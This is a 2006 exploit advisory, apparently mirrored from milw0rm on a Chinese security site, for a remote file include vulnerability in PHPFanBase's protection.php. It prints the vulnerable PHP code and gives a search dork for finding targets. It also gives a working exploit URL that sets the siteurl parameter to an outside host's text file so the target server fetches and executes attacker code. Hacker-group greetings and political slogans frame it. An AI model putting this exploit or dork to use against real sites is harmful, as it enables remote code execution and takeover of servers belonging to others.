--------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||----------------------------------------- PHPFanBase (protection.php) Remote File Include Vulnerability Found By : CoLd Zero [ Wasem898 ] Source : www.4azhar.com SpECiALPowEr.oRg A_mal Team PalesTine Arab Muslim Hacker http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif ###################################################### # # PHPFanBase ]All[ # # Class: Remote File Include Vulnerability # Published 2006-12-19 # Remote: Yes # Type: Dangerous # Site: http://codegrrl.com/!/scripts/ # # Author: Cold Zero # Contact: c.o.1.d.0@hotmail.com # # Dork: Powered By PHPFanBase ###################################################### File : /protection.php =========================== <? $user_passwords = array ( "$admin_username" => "$admin_password" ); // This is the page to show when the user has been logged out $logout_page = "$siteurl"; // Page with login form $login_page = "login.php"; // Page to show if the user enters an invalid login name or password $invalidlogin_page = "invalidlogin.php"; //DON'T EDIT ANYTHING BELOW THIS!!! if ($action == "logout") { Setcookie("logincookie[pwd]","",time() -86400); Setcookie("logincookie[user]","",time() - 86400); include($logout_page); exit; } else if ($action == "login") { if (($loginname == "") || ($password == "")) { include($invalidlogin_page); exit; } else if (strcmp($user_passwords[$loginname],$password) == 0) { Setcookie("logincookie[pwd]",$password,time() + 86400); Setcookie("logincookie[user]",$loginname,time() + 86400); } else { include($invalidlogin_page); exit; } } else { if (($logincookie[pwd] == "") || ($logincookie[user] == "")) { include($login_page); exit; } else if (strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) = = 0) { Setcookie("logincookie[pwd]",$logincookie[pwd],time() + 86400); Setcookie("logincookie[user]",$logincookie[user],time() + 86400) ; } else { include($invalidlogin_page); exit; } } =========================== Exploit : Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt? ====================================================== ---- GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[ Everyone I know **************************************************************** # *www.4azhar.com Securty Team >> www.4azhar.com * # *SpeciaL PoweR SecuritY Team >> www.specialpower.org * # *A_mal Hacking Team >> -vv -l -p The-Pradise * ***************************************************************** http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif --------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||----------------------------------------- # milw0rm.com [2006-12-19]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论